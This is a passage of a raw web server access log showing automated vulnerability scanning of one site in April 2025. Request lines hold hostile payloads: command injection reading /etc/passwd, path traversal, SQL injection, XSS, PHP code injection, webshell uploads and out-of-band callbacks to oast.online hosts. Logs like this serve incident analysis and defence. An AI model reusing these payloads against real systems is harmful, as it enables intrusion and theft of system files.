-0400] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.18" 154.84.62.234 - - [24/Apr/2025:01:50:38 -0400] "GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:52:22 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:52:24 -0400] "PUT /fileserver/2w9rfXA74hzM3sdvSwa1RKbXlPB.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:52:25 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:52:29 -0400] "GET /fileserver/2w9rfXA74hzM3sdvSwa1RKbXlPB.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:01:52:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" 154.84.62.234 - - [24/Apr/2025:01:54:09 -0400] "POST /RPC2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:01:54:16 -0400] "GET /__debugging_center_utils___.php?log=;echo%20asxeydlyfjkcpsjndtfihetbimbywnde%20|%20id HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:54:19 -0400] "GET /__debugging_center_utils___.php?log=;echo%20asxeydlyfjkcpsjndtfihetbimbywnde%20|%20ipconfig HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - maint [24/Apr/2025:01:56:27 -0400] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:56:27 -0400] "GET /webadmin/script?command=|%20nslookup%20d04qr7ij4pq19d75k4909ye16e5yq45hc.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:01:56:53 -0400] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:01:59:27 -0400] "GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:00:59 -0400] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:01:16 -0400] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:02:01:21 -0400] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:02:02:33 -0400] "POST / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) \x09\x09\x09Chrome/55.0.2883.95 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:02:33 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 154.84.62.234 - - [24/Apr/2025:02:03:30 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.27" 154.84.62.234 - - [24/Apr/2025:02:03:30 -0400] "GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.19" 154.84.62.234 - - [24/Apr/2025:02:03:31 -0400] "GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - maint [24/Apr/2025:02:05:09 -0400] "POST /maint/index.php?packages HTTP/1.1" 403 1242 "mgrokokbet.id/maint/index.php?packages" "Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - maint [24/Apr/2025:02:05:13 -0400] "GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1" 403 1242 "mgrokokbet.id/maint/index.php?packages" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:05:21 -0400] "PUT /2w9rfWquy9kFPaj51G8DGd9t3Rj.jsp/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:02:05:22 -0400] "PUT /poc.jsp/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/616.20 (KHTML, like Gecko) Version/17.1.83 Safari/616.20" 154.84.62.234 - - [24/Apr/2025:02:05:27 -0400] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:02:05:27 -0400] "GET /2w9rfWquy9kFPaj51G8DGd9t3Rj.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:02:11:51 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:02:12:00 -0400] "GET /2w9rfcUs4eBDEWLLJWHRcZPAdDr.php%5Cx0A HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.17" 154.84.62.234 - - [24/Apr/2025:02:15:05 -0400] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:15:09 -0400] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:15:15 -0400] "POST /invoker/readonly HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 199.168.98.202 - - [24/Apr/2025:02:23:21 -0400] "GET /about.php?ac=u_h_s_1&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [24/Apr/2025:02:26:06 -0400] "GET /640275/about.php?ac=u_h_s_1&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:27:48 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:28:37 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:02:31:25 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:02:31:26 -0400] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:02:31:44 -0400] "GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:31:45 -0400] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://d04qr7ij4pq19d75k4908uog1ij7wmduo.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:02:32:05 -0400] "POST /integration/saveGangster.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:02:33:21 -0400] "GET /__ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" 154.84.62.234 - - [24/Apr/2025:02:33:58 -0400] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 154.84.62.234 - - [24/Apr/2025:02:33:58 -0400] "POST /cobbler_api HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:34:24 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:02:36:59 -0400] "POST /nagiosql/admin/logbook.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:02:36:59 -0400] "POST /nagiosql/admin/menuaccess.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:02:39:16 -0400] "POST /admin/index.php?id=pages HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:39:23 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:02:39:26 -0400] "POST /clients/editclient.php?id=2w9rffcmJEWozzaI97eDWShIkYl&action=update HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/618.5.10 (KHTML, like Gecko) Version/17.5 Safari/618.5.10" 154.84.62.234 - - [24/Apr/2025:02:39:29 -0400] "GET /hw-sys.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:02:39:34 -0400] "GET /logos_clients/2w9rffcmJEWozzaI97eDWShIkYl.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:39:37 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:02:40:00 -0400] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:41:33 -0400] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" 154.84.62.234 - - [24/Apr/2025:02:41:38 -0400] "POST /orders/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:02:42:49 -0400] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.18" 154.84.62.234 - - [24/Apr/2025:02:42:54 -0400] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 66.249.79.167 - - [24/Apr/2025:02:43:13 -0400] "GET /robots.txt HTTP/1.1" 200 62 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 154.84.62.234 - - [24/Apr/2025:02:43:10 -0400] "POST /modules/attributewizardpro/file_upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.16" 66.249.79.167 - - [24/Apr/2025:02:43:14 -0400] "GET /.well-known/assetlinks.json HTTP/1.1" 200 38753 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 154.84.62.234 - - [24/Apr/2025:02:44:14 -0400] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:02:45:15 -0400] "POST /account HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.2.20" 154.84.62.234 - - [24/Apr/2025:02:45:15 -0400] "POST /account HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:02:45:15 -0400] "POST /system/sharedir.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:02:45:18 -0400] "POST /en/php/usb_sync.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:47:14 -0400] "POST /filemanager/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620" 154.84.62.234 - - [24/Apr/2025:02:47:24 -0400] "POST /fcgi-bin/wgsetcgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" 154.84.62.234 - - [24/Apr/2025:02:47:38 -0400] "PUT /meta HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22" 154.84.62.234 - - [24/Apr/2025:02:48:31 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:49:29 -0400] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:02:49:29 -0400] "POST /upload HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:49:39 -0400] "GET /users/registration HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.23" 154.84.62.234 - - [24/Apr/2025:02:50:07 -0400] "POST /web/google_analytics.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:51:46 -0400] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 403 1242 "https://mgrokokbet.id" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:55:18 -0400] "GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login&CipheredValue HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:02:55:23 -0400] "GET /session/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:55:27 -0400] "POST /wp-admin/admin.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:02:55:47 -0400] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:02:55:56 -0400] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2w9rffei5NLr6JIePFYp5VLmp2z.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.27" 154.84.62.234 - - [24/Apr/2025:02:56:04 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.21" 154.84.62.234 - - [24/Apr/2025:03:01:43 -0400] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:03:01:49 -0400] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:03:07:04 -0400] "GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:07:08 -0400] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:08:01 -0400] "POST /XMLCHART HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:10:18 -0400] "GET / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:10:22 -0400] "GET / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:12:26 -0400] "POST /OA_HTML/lcmServiceController.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:13:46 -0400] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:14:43 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.17" 154.84.62.234 - - [24/Apr/2025:03:14:44 -0400] "POST /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063" 154.84.62.234 - - [24/Apr/2025:03:14:53 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.25" 154.84.62.234 - - [24/Apr/2025:03:14:54 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:03:15:10 -0400] "POST /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:03:15:12 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:03:15:15 -0400] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:15:18 -0400] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:15:21 -0400] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 154.84.62.234 - - [24/Apr/2025:03:15:24 -0400] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:15:27 -0400] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:03:15:26 -0400] "POST /php/upload.php HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:15:32 -0400] "GET /Uploads/2w9rfRzQbJbYxgej9ol3tRMFU9V.php7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:15:58 -0400] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 1242 "mgrokokbet.id/user/register" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:17:11 -0400] "GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:03:18:47 